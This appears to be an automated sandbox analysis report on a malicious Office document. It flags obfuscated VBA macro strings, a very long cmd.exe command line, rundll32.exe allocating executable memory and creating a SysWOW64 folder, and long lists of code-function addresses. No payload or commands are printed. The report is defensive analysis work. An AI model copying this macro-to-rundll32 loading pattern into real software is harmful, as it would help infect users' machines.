                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
                    Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE
                    Very long command line foundShow sources
                    Source: unknownProcess created: Commandline size = 5709
                    Source: unknownProcess created: Commandline size = 5613
                    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5613
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Gpnlsmsow\Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000976F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022B41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00222C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022C0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022EE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002302C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002342DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00228736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00227B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00234B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022F444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022E05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023A0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002280BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002260B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002248BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002288E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00221CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002320C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00230D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022F536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022B112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00238D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002269A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00236DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002361B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022F98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00227998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00226D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002331E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002371EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00222A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00229A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00224A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00235A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022EA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002262A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00221280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002312E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002326F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002296CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00238ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022BB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00230F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00237F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022C769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00230B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00231773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022E377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00228F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00225B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00239B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00232349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00238F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00226754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022B75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002217AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002373AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0023878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00233FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022D7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002367E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002363C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00231BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00229FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002BA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002ABB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002B1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002A9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006DA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006D9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006C7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D4A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D9A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D2A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DE05A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E5A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E889D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D1280
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D48BD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D60B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D80BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D62A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D96CD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E20C5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E26F5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D88E5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E12E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E2B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E7D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DF536
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DB75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E2349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E8F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E9B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D5B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D8F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DE377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E1773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E0B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D7998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DF98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E9586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E61B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D17AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E73AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D69A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001D9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E71EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DD7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E67E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E31E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B2C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BEE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BB41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C02C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C42DA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B568E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C3895
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C4B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B7B63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004B8736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004C63C1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BF444
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BE05A
